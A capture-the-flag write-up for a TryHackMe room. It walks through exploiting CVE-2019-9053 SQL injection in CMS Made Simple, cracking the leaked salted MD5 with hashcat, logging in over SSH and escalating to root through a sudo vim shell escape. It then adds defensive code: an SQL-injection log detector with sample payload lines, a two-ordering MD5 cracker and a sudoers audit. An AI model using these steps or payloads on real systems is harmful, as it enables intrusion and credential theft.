# TryHackMe - EasyCTF Writeup

https://tryhackme.com/room/easyctf

- [x] Recon
- [x] Exploit
- [x] Access
- [x] Priv Esc

## Recon

`nmap -sV 10.10.122.103`

I didn't log the output, but it shows the following services:

- `ftp` on port `21`
- `http` (Apache) on port `80`
- `ssh` on port `2222`

`gobuster` with `rockyou.txt` shows a `simple` directory being open, which serves a CMS Made Simple site.

## Exploit

From searching, we found that CMS Made Simple had this CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9053

This is a time-based blind SQL injection in https://www.cmsmadesimple.org/ , for which someone has published an exploit script here: https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py

`python exploit.py -u http://10.10.122.103/simple`

```
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
```

pass+salt = `0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2`

To crack this I ran hashcat in MD5 mode (I had to try both `$salt.$pass` and `$pass.$salt` before it cracked) with `rockyou.txt` as the wordlist:

```bash
.\hashcat.exe -m 20 '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' .\wordlist\rockyou.txt
```

which shows:

```
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Fri Oct 21 01:50:55 2022 (0 secs)
Time.Estimated...: Fri Oct 21 01:50:55 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\wordlist\rockyou.txt)
```

Password: `secret`

## Access

`ssh`

- user + address: `mitch@10.10.122.103`
- port: `2222`
- pass: `secret`

## PrivEsc

It seems `bash` is not allowed to be run as root, but with `ls -al` we see a vim config/history file, and `vim` turns out to be runnable via sudo. So the privesc command is `vim -c ':!/bin/sh'`, and voilà, we got root! funfun!
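On the detection side of the Exploit step: a time-based blind SQL injection like the one the linked script automates has to send many requests carrying a database delay primitive (`SLEEP()`, `BENCHMARK()` and the like), which leaves a very recognisable trail in the web server's access log. The following is an added example, not part of this writeup or of the exploit script it links, that scans constructed Apache combined-format log lines for those primitives and counts hits per client. The `/simple/index.php?id=` paths and the client IPs in the sample are assumptions made up for the demonstration, not the parameters the real CVE abuses.

```python
"""Detect time-based blind SQL injection attempts in web server access logs.

Added example (not from the original writeup or the linked exploit script).
It scans constructed Apache combined-format log lines for the delay
primitives time-based blind SQLi relies on and reports a per-client count,
so a defender can spot the long run of near-identical requests such an
attack needs.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Delay primitives across common database engines. The regexes run on the
# URL-decoded request path, case-insensitively.
DELAY_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),          # MySQL / MariaDB
    re.compile(r"\bbenchmark\s*\(", re.I),      # MySQL
    re.compile(r"\bpg_sleep\s*\(", re.I),       # PostgreSQL
    re.compile(r"\bwaitfor\s+delay\b", re.I),   # MSSQL
    re.compile(r"dbms_lock\.sleep", re.I),      # Oracle
]

# Apache "combined" format: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_time_based_sqli(url):
    """True if the decoded URL contains a database delay primitive."""
    decoded = unquote_plus(url)
    # Decode a second time: double-encoded payloads are a common filter bypass.
    decoded = unquote_plus(decoded)
    return any(p.search(decoded) for p in DELAY_PATTERNS)


def scan(lines):
    """Return {client_ip: number_of_suspicious_requests} over the given lines."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and is_time_based_sqli(rec["url"]):
            hits[rec["ip"]] += 1
    return dict(hits)


# Constructed sample: the IPs, timestamps and query strings are made up here.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2022:01:40:01 +0000] "GET /simple/index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2022:01:40:02 +0000] "GET /simple/index.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2022:01:40:08 +0000] "GET /simple/index.php?id=1%20AND%20IF(1=1,SLEEP(5),0) HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2022:01:40:14 +0000] "GET /simple/index.php?id=1%2520AND%2520BENCHMARK(5000000,MD5(1)) HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Oct/2022:01:40:20 +0000] "GET /simple/news/sleepy-article HTTP/1.1" 200 3000',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, n in scan(SAMPLE_LOG).items():
        print(f"{ip}: {n} suspicious request(s)")
```

A signature match on its own is noisy; the per-client count is what makes it useful, because a blind extraction of a 32-character hash plus a 16-character salt needs hundreds of such requests from one source in a short window, which an alerting rule can threshold on. Pairing the match with response time (`%D` in the Apache log format) tightens it further, since only the requests whose condition was true actually take the full delay.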
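The hash-cracking step above needed two attempts because a raw salted MD5 tells you nothing about whether the salt was prepended or appended; hashcat mode 20 is `md5($salt.$pass)` and mode 10 is `md5($pass.$salt)`. The following is an added example, not part of this writeup, that parses the `hash:salt` line the exploit produced and tries each candidate password under both orderings, so the ordering is discovered rather than guessed. The page's hash and salt are used as constants; the short wordlist standing in for `rockyou.txt` is constructed for the demonstration.

```python
"""Try both salt orderings for a raw salted MD5 hash against a wordlist.

Added example, not from the original writeup. CMS Made Simple stores an
unsalted-looking MD5 that actually covers salt+password; hashcat mode 20
computes md5($salt.$pass) and mode 10 computes md5($pass.$salt). Trying both
per candidate removes the need to guess the mode up front.
"""
import hashlib
import hmac

# The hash:salt pair reported on the page by the exploit script.
PAGE_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"
PAGE_SALT = "1dac0d92e9fa6bb2"

# Both concatenation orders, keyed by the hashcat mode that implements them.
ORDERINGS = {
    "20 md5($salt.$pass)": lambda salt, pw: hashlib.md5((salt + pw).encode()).hexdigest(),
    "10 md5($pass.$salt)": lambda salt, pw: hashlib.md5((pw + salt).encode()).hexdigest(),
}


def parse_hash_line(line):
    """Split a 'hash:salt' line (the format hashcat consumes) into (digest, salt)."""
    digest, salt = line.strip().split(":", 1)
    digest = digest.lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a hex MD5 digest: %r" % digest)
    return digest, salt


def crack(digest, salt, wordlist):
    """Return (password, ordering) for the first candidate matching either order,
    or None if the wordlist is exhausted."""
    for pw in wordlist:
        for name, fn in ORDERINGS.items():
            # Constant-time comparison is the habit to keep for any verifier,
            # even though timing is irrelevant in an offline check like this.
            if hmac.compare_digest(fn(salt, pw), digest):
                return pw, name
    return None


if __name__ == "__main__":
    digest, salt = parse_hash_line(PAGE_HASH + ":" + PAGE_SALT)
    # Constructed stand-in for rockyou.txt.
    print(crack(digest, salt, ["123456", "password", "letmein", "secret"]))
```

The wider point for anyone running such an application: a single unkeyed MD5 over salt and password is exactly why a wordlist finished this in under a second. A password hash that survives a database leak needs a deliberately slow, memory-hard construction (bcrypt, scrypt or Argon2), at which point the salt ordering question disappears because the format encodes its own parameters.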
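The privesc works because `vim` may be run under sudo and vim can spawn a child process from inside the editor; any editor, pager or interpreter with that ability turns a narrow sudo grant into a root shell. The following is an added example, not part of this writeup, of the audit a defender would run over a sudoers file: it parses user-specification lines and flags commands whose binary is a known shell-escape tool unless the rule carries sudo's `NOEXEC` tag, plus any unrestricted `ALL` command grant. The sudoers content below is a constructed sample, not the CTF box's real configuration, and the list of escape-capable binaries is illustrative rather than exhaustive.

```python
"""Audit sudoers user specifications for commands that can reach a root shell.

Added example, not from the original writeup. It parses constructed sudoers
lines and reports commands whose binary can execute a sub-process (editors,
pagers, interpreters) when the rule lacks the NOEXEC tag, and reports
unrestricted ALL grants.
"""
import os
import re

# Binaries that can launch a sub-process from inside (illustrative list).
SHELL_ESCAPE_BINS = {
    "vim", "vi", "vim.basic", "vim.tiny", "nano", "less", "more", "man",
    "find", "awk", "gawk", "perl", "python", "python3", "bash", "sh", "tar", "zip",
}

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL"}

# user host=(runas[:group]) [TAG: ...] cmd[, cmd ...]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def _apply_tag(tags, tag):
    """Add a tag, dropping its opposite (EXEC cancels NOEXEC and vice versa)."""
    opposite = tag[2:] if tag.startswith("NO") else "NO" + tag
    tags.discard(opposite)
    tags.add(tag)


def parse_spec(line):
    """Parse one user specification into (user, runas_user, [(tags, command), ...]).
    Returns None for blank, comment, Defaults and alias lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    # A missing runas list means root; "(ALL:ALL)" keeps only the user part.
    runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
    entries, active = [], set()
    for item in m.group("cmds").split(","):
        item = item.strip()
        # Tags stick to every following command in the list until overridden.
        while True:
            head, sep, tail = item.partition(":")
            if sep and head.strip().upper() in TAGS:
                _apply_tag(active, head.strip().upper())
                item = tail.strip()
            else:
                break
        entries.append((frozenset(active), item))
    return m.group("user"), runas, entries


def audit(lines):
    """Return findings as (user, runas, command, reason) tuples for rules reaching root."""
    findings = []
    for line in lines:
        parsed = parse_spec(line)
        if not parsed:
            continue
        user, runas, entries = parsed
        if runas not in ("root", "ALL"):
            continue
        for tags, cmd in entries:
            if cmd == "ALL":
                findings.append((user, runas, cmd, "unrestricted command grant"))
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINS and "NOEXEC" not in tags:
                findings.append((user, runas, cmd, "shell-escape capable binary without NOEXEC"))
    return findings


# Constructed sample, not the CTF box's real sudoers.
SAMPLE_SUDOERS = """
Defaults env_reset
Cmnd_Alias SERVICES = /usr/bin/systemctl
root ALL=(ALL:ALL) ALL
mitch ALL=(root) NOPASSWD: /usr/bin/vim
alice ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
bob ALL=(root) /usr/bin/systemctl restart app, /usr/bin/find / -name core
carol ALL=(www-data) /usr/bin/vim
%admin ALL=(ALL) ALL
""".strip().splitlines()

if __name__ == "__main__":
    for user, runas, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {cmd}: {reason}")
```

Two caveats on the mitigation this audit points at. `NOEXEC` stops the `:!` escape because it blocks the `exec` family in the sudo'd process, but a root editor can still read and write any file, so the grant is still far wider than "edit this one file"; `sudoedit` (or `sudo -e`) on a specific path is the scoped alternative, since the editor then runs as the invoking user on a copy. And the audit only sees lines in the files you feed it, so include `/etc/sudoers.d/*` as well as `/etc/sudoers`.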